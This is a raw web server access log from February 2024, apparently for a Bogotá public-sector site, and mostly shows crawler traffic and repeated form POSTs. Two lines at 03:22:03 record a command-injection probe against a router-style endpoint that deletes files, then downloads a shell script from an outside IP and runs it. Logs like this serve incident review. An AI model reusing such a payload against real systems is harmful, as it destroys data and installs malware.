216.244.66.195 - - [27/Feb/2024:03:03:51 -0500] "GET /BLA/resoluciones/AUTOS%202023/0396.pdf HTTP/1.1" 200 376832
201.245.192.253 - - [27/Feb/2024:03:04:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.195 - - [27/Feb/2024:03:04:25 -0500] "GET /BLA/resoluciones/AUTOS%202023/0861.pdf HTTP/1.1" 200 418471
216.244.66.195 - - [27/Feb/2024:03:04:53 -0500] "GET /BLA/resoluciones/AUTOS%202023/1302.pdf HTTP/1.1" 200 666001
216.244.66.195 - - [27/Feb/2024:03:05:20 -0500] "GET /BLA/resoluciones/AUTOS%202023/1321.pdf HTTP/1.1" 200 483521
201.245.192.253 - - [27/Feb/2024:03:05:46 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [27/Feb/2024:03:04:09 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.244.66.195 - - [27/Feb/2024:03:05:50 -0500] "GET /BLA/resoluciones/AUTOS%202023/1651.pdf HTTP/1.1" 200 407124
201.245.192.253 - - [27/Feb/2024:03:06:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.195 - - [27/Feb/2024:03:06:15 -0500] "GET /BLA/resoluciones/AUTOS%202023/1806.pdf HTTP/1.1" 200 355685
172.22.2.4 - - [27/Feb/2024:03:05:00 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59083
216.244.66.195 - - [27/Feb/2024:03:06:45 -0500] "GET /BLA/resoluciones/AUTOS%202023/4078.pdf HTTP/1.1" 200 333026
216.245.221.92 - - [27/Feb/2024:03:07:05 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [27/Feb/2024:03:07:10 -0500] "GET /BLA/resoluciones/AUTOS%202023/4109.pdf HTTP/1.1" 200 388499
201.245.192.253 - - [27/Feb/2024:03:07:46 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:03:08:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:03:08:19 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39776
201.245.192.253 - - [27/Feb/2024:03:09:46 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:03:10:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [27/Feb/2024:03:09:59 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
164.52.0.94 - - [27/Feb/2024:03:11:39 -0500] "GET /portaldeninos/ HTTP/1.1" 200 110175
201.245.192.253 - - [27/Feb/2024:03:11:46 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:03:12:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [27/Feb/2024:03:12:05 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [27/Feb/2024:03:10:50 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59083
201.245.192.253 - - [27/Feb/2024:03:13:19 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39776
201.245.192.253 - - [27/Feb/2024:03:13:46 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:03:14:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:03:15:46 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:03:16:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [27/Feb/2024:03:17:05 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [27/Feb/2024:03:15:49 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [27/Feb/2024:03:17:46 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:03:18:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:03:18:16 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39776
172.22.2.4 - - [27/Feb/2024:03:16:40 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60730
201.245.192.253 - - [27/Feb/2024:03:19:46 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:03:19:50 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39639
201.245.192.253 - - [27/Feb/2024:03:19:53 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37244
201.245.192.253 - - [27/Feb/2024:03:20:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:03:20:02 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39935
201.245.192.253 - - [27/Feb/2024:03:20:53 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37244
201.245.192.253 - - [27/Feb/2024:03:21:46 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [27/Feb/2024:03:22:03 -0500] "GET /BLA/boletinlegal/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F94.156.8.244%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh) HTTP/1.1" 404 1018
172.22.2.4 - - [27/Feb/2024:03:22:03 -0500] "GET /BLA/boletinlegal/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F94.156.8.244%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh) HTTP/1.1" 404 1018
201.245.192.253 - - [27/Feb/2024:03:22:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [27/Feb/2024:03:22:05 -0500] "HEAD / HTTP/1.1" 200 -
130.84.14.30 - - [27/Feb/2024:03:22:22 -0500] "GET /robots.txt HTTP/1.1" 404 1035
130.84.14.30 - - [27/Feb/2024:03:22:23 -0500] "GET /portaldeninos/wp-content/uploads/2021/07/residuos-pagina-ni%C3%B1os.jpg HTTP/1.1" 200 316433
172.22.2.4 - - [27/Feb/2024:03:20:48 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60730
172.22.2.4 - - [27/Feb/2024:03:22:33 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
201.245.192.253 - - [27/Feb/2024:03:23:15 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39776
172.22.2.4 - - [27/Feb/2024:03:21:39 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [27/Feb/2024:03:23:46 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
168.119.252.243 - - [27/Feb/2024:03:24:01 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [27/Feb/2024:03:24:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [27/Feb/2024:03:22:30 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58720
201.245.192.253 - - [27/Feb/2024:03:25:46 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:03:26:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [27/Feb/2024:03:27:05 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [27/Feb/2024:03:27:46 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:03:28:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:03:28:13 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39776
172.22.2.4 - - [27/Feb/2024:03:27:29 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [27/Feb/2024:03:29:46 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:03:29:51 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39639
201.245.192.253 - - [27/Feb/2024:03:29:54 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37244
172.22.2.4 - - [27/Feb/2024:03:28:20 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60380
201.245.192.253 - - [27/Feb/2024:03:30:01 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39935
201.245.192.253 - - [27/Feb/2024:03:30:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:03:30:52 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37244
40.77.167.20 - - [27/Feb/2024:03:30:58 -0500] "GET /appsia/controlador HTTP/1.1" 200 4799
157.55.39.58 - - [27/Feb/2024:03:31:11 -0500] "GET /appsia/scripts/validarIngreso.js HTTP/1.1" 200 851
40.77.167.54 - - [27/Feb/2024:03:31:16 -0500] "GET /appsia/css/estilos.css HTTP/1.1" 200 4804
201.245.192.253 - - [27/Feb/2024:03:31:46 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:03:32:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [27/Feb/2024:03:32:05 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [27/Feb/2024:03:33:11 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39776
201.245.192.253 - - [27/Feb/2024:03:33:46 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:03:34:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [27/Feb/2024:03:33:19 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [27/Feb/2024:03:35:46 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [27/Feb/2024:03:34:10 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58720
201.245.192.253 - - [27/Feb/2024:03:36:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
199.16.157.183 - - [27/Feb/2024:03:36:29 -0500] "GET /robots.txt HTTP/1.1" 404 1034
199.16.157.183 - - [27/Feb/2024:03:36:29 -0500] "GET /images/pl%C3%A1sticos%20foto%201..jpg HTTP/1.1" 404 1034
162.55.170.174 - - [27/Feb/2024:03:36:58 -0500] "GET / HTTP/1.1" 200 4720
216.245.221.92 - - [27/Feb/2024:03:37:05 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [27/Feb/2024:03:37:46 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:03:38:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:03:38:10 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39776
201.245.192.253 - - [27/Feb/2024:03:39:46 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:03:39:50 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39639
201.245.192.253 - - [27/Feb/2024:03:39:53 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37244
157.55.39.56 - - [27/Feb/2024:03:40:03 -0500] "GET /Publicaciones/2023EE115511.pdf HTTP/1.1" 404 228
201.245.192.253 - - [27/Feb/2024:03:40:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:03:40:02 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39935
172.22.2.4 - - [27/Feb/2024:03:39:09 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [27/Feb/2024:03:40:52 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37244
52.167.144.194 - - [27/Feb/2024:03:41:25 -0500] "GET /BLA/resoluciones/AUTOS%202017/3239.pdf HTTP/1.1" 200 270672
172.22.2.4 - - [27/Feb/2024:03:40:00 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60730
201.245.192.253 - - [27/Feb/2024:03:41:46 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:03:42:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [27/Feb/2024:03:42:05 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [27/Feb/2024:03:43:09 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39776
201.245.192.253 - - [27/Feb/2024:03:43:46 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:03:44:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.195 - - [27/Feb/2024:03:44:06 -0500] "GET /robots.txt HTTP/1.1" 404 1018
201.245.192.253 - - [27/Feb/2024:03:45:46 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:03:46:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [27/Feb/2024:03:44:59 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [27/Feb/2024:03:47:05 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [27/Feb/2024:03:45:49 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58720
185.242.226.10 - - [27/Feb/2024:03:47:39 -0500] "GET /portaldeninos/ HTTP/1.1" 200 110175
201.245.192.253 - - [27/Feb/2024:03:47:46 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:03:48:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:03:48:07 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39776
20.26.80.131 - - [27/Feb/2024:03:48:35 -0500] "GET /Publicaciones/2023EE134974.pdf HTTP/1.1" 404 228
201.245.192.253 - - [27/Feb/2024:03:49:46 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:03:50:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:03:51:46 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:03:52:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [27/Feb/2024:03:52:05 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [27/Feb/2024:03:50:49 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.79.107 - - [27/Feb/2024:03:52:33 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202013/1188.pdf HTTP/1.1" 200 427655
201.245.192.253 - - [27/Feb/2024:03:53:05 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39776
172.22.2.4 - - [27/Feb/2024:03:51:40 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59083
201.245.192.253 - - [27/Feb/2024:03:53:46 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:03:54:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:03:55:46 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:03:56:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
52.167.144.236 - - [27/Feb/2024:03:56:12 -0500] "GET /calidad-del-aire-de-bogota-empieza-a-deteriorarse-producto-de-incendios-forestales.html HTTP/1.1" 200 741
216.245.221.92 - - [27/Feb/2024:03:57:05 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [27/Feb/2024:03:57:46 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:03:58:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:03:58:04 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39776
172.22.2.4 - - [27/Feb/2024:03:56:39 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [27/Feb/2024:03:57:30 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60730
201.245.192.253 - - [27/Feb/2024:03:59:46 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:04:00:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.79.107 - - [27/Feb/2024:04:01:42 -0500] "GET /resoluciones/RESOLUCIONES%202008/2789.pdf HTTP/1.1" 404 1018
201.245.192.253 - - [27/Feb/2024:04:01:46 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:04:02:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:04:03:02 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39776
201.245.192.253 - - [27/Feb/2024:04:03:46 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:04:04:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.112.41 - - [27/Feb/2024:04:05:44 -0500] "GET /BLA/resoluciones/index.php?dir=Notificaciones%2FAUTOS%200023%2F&order=asc&sort=name HTTP/1.1" 200 2021
47.128.112.41 - - [27/Feb/2024:04:05:44 -0500] "GET /BLA/resoluciones/dlf/styles.css HTTP/1.1" 200 3049
201.245.192.253 - - [27/Feb/2024:04:05:46 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.112.41 - - [27/Feb/2024:04:05:46 -0500] "GET /BLA/resoluciones/dlf/dirup.png HTTP/1.1" 200 644
47.128.112.41 - - [27/Feb/2024:04:05:46 -0500] "GET /BLA/resoluciones/dlf/pdf.gif HTTP/1.1" 200 272
201.245.192.253 - - [27/Feb/2024:04:06:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [27/Feb/2024:04:06:14 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [27/Feb/2024:04:05:15 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [27/Feb/2024:04:07:46 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [27/Feb/2024:04:06:06 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59083
201.245.192.253 - - [27/Feb/2024:04:08:01 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39776
201.245.192.253 - - [27/Feb/2024:04:08:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.79.107 - - [27/Feb/2024:04:08:57 -0500] "GET /BLA/resoluciones/AUTOS%202012/2566.pdf HTTP/1.1" 200 505067
66.249.79.96 - - [27/Feb/2024:04:08:59 -0500] "GET /bla/resoluciones/RESOLUCIONES%202010/7385.pdf HTTP/1.1" 200 156805
66.249.79.107 - - [27/Feb/2024:04:09:00 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1694.pdf HTTP/1.1" 200 287833
